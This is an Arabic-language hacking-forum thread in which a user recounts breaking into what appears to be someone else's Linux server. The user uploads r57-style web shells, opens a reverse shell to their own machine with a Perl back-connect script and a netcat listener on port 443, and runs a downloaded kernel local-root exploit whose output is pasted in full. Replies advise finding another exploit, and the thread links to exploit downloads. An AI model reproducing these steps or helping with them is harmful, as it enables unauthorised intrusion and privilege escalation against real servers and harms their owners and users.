:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   مشكلة غريـــــبة في اخذ رووت من سيرفر عنيـــد (http://www.vbspiders.com/vb/t46346.html)

Dr-X-Designer 04-15-2011 10:40 AM
مشكلة غريـــــبة في اخذ رووت من سيرفر عنيـــد
 
صباح الخير يا اصدقاء
للاسف يبدو ان السيرفر اللي انا عليه عنيد : (
اولا دي المشاكل اللي قبلتني
1- اللوكال اللي معايا تقريبا مش لاصدار كرنل السيرفر لانه مش شغال معايا
ده رابط اللوكال اللي انا حملته : http://www.mediafire.com/?dbquci8jq0bfv2k
وده اصدار كرنال السيرفر :
كود PHP:
Linux rs2.----.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 
مبدئيا انا لما بشتغل بشيل r57 الانجليزي او المعرب او المعدل زي سنيبر وغيره لا استطيع عمل اتصال عكسي ولما بضغط connect بيظهر خطأ
كود PHP:
خطاء لايمكن الكتابة على هذا الملف 
انا نزلت شيل جديد لكنه اشتغل معايا ونجحت في عمل اتصال عكسي على البورت 443
من خلال الامر nc -vlp 443
ولما بضغط اتصال بتظهر في الشيل الرسالة دي :
كود PHP:
mwezi     4539  0.0  0.0  27448  2544 ?        S    06:29   0:00 perl /tmp/bc.pl xx.238.xx.2 443
mwezi     4563  0.0  0.0  10796  1068 ?        S    06:29   0:00 sh -c ps aux grep bc.pl
mwezi     4565  0.0  0.0   6024   580 ?        S    06:29   0:00 grep bc.pl 
وبيظهر في cmd الرسالة دي :
كود PHP:
C:\shell>nc -vlp 443
listening on [any443 ...
connect to [192.168.1.84from rs2.-----.com [xx.127.xx.5239690
shno job control in this shell
sh-3.2
وعلشان اتأكد انه تم الاتصال بنجاح بكتب الامر id بيظهر الصلاحية يوزر عادي
كود PHP:
uid=2808(mwezigid=2793(mwezigroups=2793(mwezi
بعدين رفعت اللوكال على السيرفر في نفس مسار الشيل وبعدين فكيت ضغطه
لكن لما حاولت اغير تصريح اللوكال ل 777 من ال cmd عن طريق الامر chmod 777 local ظهرت الرسالة دي :
كود PHP:
sh: /bin/chmodPermission denied 
طبعا لما ظهرت رسالة عدم امتلاك الصلاحية لتنفيذ الامر دخلت الشيل وغيرت تصريح اللوكل يدوي ل 777
ورجعت لل cmd وحاولت اكتب امر تشغيل اللوكل
كود PHP:
./local 
ظهرتلي الرسالة دي :
كود PHP:
sh-3.2$ ./local
?[32mAc1dB1tCh3z ?[0mVS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as32.6.18-194.26.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 F0PZzzZzZZ/LSD(Mm3th34d
$$$ Preparem0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
!!! y0u fuq1ng f41lg3t th3 fuq 0ut!
sh-3.2
لاحظ في نهاية الرسالة مكتوب : y0u fuq1ng f41l. g3t th3 fuq 0ut!
مش عارف دي رسالة حماية من صاحب السيرفر ولا دي رسالة عادية بتفيد فشل تنفذ اللوكل
المهم انا حاولت اتجاهل الرسالة وجربت اشوف الصلاحية من خلال الامر id
لكن للاسف لسه مازالت يوزر عادي
كود PHP:
uid=2808(mwezigid=2793(mwezigroups=2793(mwezi

طبعا زي ما شفتوا كل المحاولات فشلت : (
هنعمل ايه دلوقتي مع السيرفر العنيد ده
^_^

KaLa$nikoV 04-15-2011 07:07 PM
اول شيء موفق بكل خطوه عملتها لكن حظك

انتقائك للوكال غير مناسب هذا كل ما في الامر

مزيد من الايضاح
-----------------------------------
امر chmod معطل من خلال الاتصال العكسي بالسيرفر لديك
(حمايه من السيرفر )
عند تشغيل اللوكال ./local
يشتغل اللوكال لكنه يقوم باخبارك انه لم يتم ترويت السيرفر وذلك
لانه غير متوافق والله اعلم

تحتاج الى لوكال اخر

ربنا يوفقك

Dr-X-Designer 04-15-2011 09:06 PM
يا مراحب باهل فلسطين الغالية ..
انا من الصبح بحاول ابحث عن لوكال لاصدار الكرنال ده لكن كل البحث كان عبارة عن اسئلة والاجابات لا تحتوي على لوكلات تعمل : (
انا هحاول مع لوكلات فيروس كوالا : http://www.vbspiders.com/vb/t35673.html
لكن غدا صباحا باذن الله ..
اتمنى ان تتابع معي غدا يا صديقي انا عارف انك اكيد وراك اعمال كثيرة الله يعينك لكن اتمنى تتابع معايا غدا ان شاء الله


الساعة الآن 05:19 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0